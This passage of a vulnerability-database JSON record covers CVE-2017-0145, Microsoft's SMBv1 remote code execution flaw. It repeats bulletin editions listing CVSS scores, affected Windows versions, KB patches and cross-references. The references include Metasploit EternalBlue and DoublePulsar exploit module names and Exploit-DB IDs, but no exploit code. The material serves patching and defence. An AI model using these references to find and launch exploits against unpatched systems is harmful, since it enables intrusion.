32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-07T08:44:10", "differentElements": ["msAffectedSoftware"], "edition": 19}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-07T10:44:22", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:2E043D9BAC04DEE81005124DD54A31E2"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA10979", "KLA11902"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27613"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:47456", "EDB-ID:41987"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700059.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-07T10:44:22", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-07T10:44:22", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB4012212", "KB3213986", "KB3210720", "KB3205401", "KB4012598", "KB4014077", "KB3177186", "KBMS16-110, 3187754", "KB3212646", "KB4013198", "KB4013429", "KB4012216", "KB4012606", "KB3210721", "KB4012215", "KB3205409", "KB4012213", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-07T10:44:22", "differentElements": ["msAffectedSoftware"], "edition": 20}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "a5cb2f08ef111b264f0d461381e554af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-08T14:45:18", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8"]}, {"type": "symantec", "idList": ["SMNTC-96705"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "threatpost", "idList": ["THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:302BC8714784E3B4BB7EC5CD2F81C1BA"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10977", "KLA10979"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:154690", "PACKETSTORM:142548"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-33895"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "MS17-010.NASL", "700099.PRM", "700059.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-08T14:45:18", "rev": 2}, "score": {"value": 7.5, "vector": "NONE", "modified": "2021-09-08T14:45:18", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KB4012214", "KB4012217", "KB4012212", "KB4013429", "KB4012213", "KB3210721", "KB3212646", "KB3210720", "KB4012606", "KB3177186", "KB4012216", "KB3205409", "KB3213986", "KB4012598", "KBMS16-110, 3187754", "KB4014077", "KB4013198", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0145", "msAffectedSoftware": [{"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB4014077", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-08T14:45:18", "differentElements": ["msAffectedSoftware"], "edition": 21}, {"bulletin": {"id": "MS:CVE-2017-0145", "hash": "5909803c234c7ba25bf5a9f51be4ff6f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0145", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-09-08T16:54:43", "history": [], "viewCount": 46, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0145"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", 